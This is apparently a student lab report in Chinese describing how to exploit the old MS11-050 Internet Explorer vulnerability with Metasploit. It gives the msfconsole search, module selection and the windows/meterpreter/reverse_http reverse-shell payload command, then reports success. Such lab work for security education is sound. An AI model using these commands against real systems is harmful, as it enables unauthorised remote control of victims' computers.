实验过程

msfconsole命令进入控制台

使用命令search ms11_050查看针对MS11_050漏洞的攻击模块

20145322 Exp5 MS11_050

使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement 进入模块,并使用info查看该模块的具体信息

20145322 Exp5 MS11_050

设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。

使用命令set payloads windows/meterpreter/reverse_http

使用show options 查看具体参数设置

20145322 Exp5 MS11_050

设置其相关参数,攻击

20145322 Exp5 MS11_050

成功

20145322 Exp5 MS11_050

相关文章:

  • 2021-10-28
  • 2021-07-10
  • 2021-04-21
  • 2021-08-31
  • 2021-11-28
  • 2021-10-28
  • 2021-12-30
猜你喜欢
  • 2021-09-12
  • 2021-09-26
  • 2021-09-15
  • 2021-11-11
  • 2021-10-08
  • 2021-12-12
相关资源
相似解决方案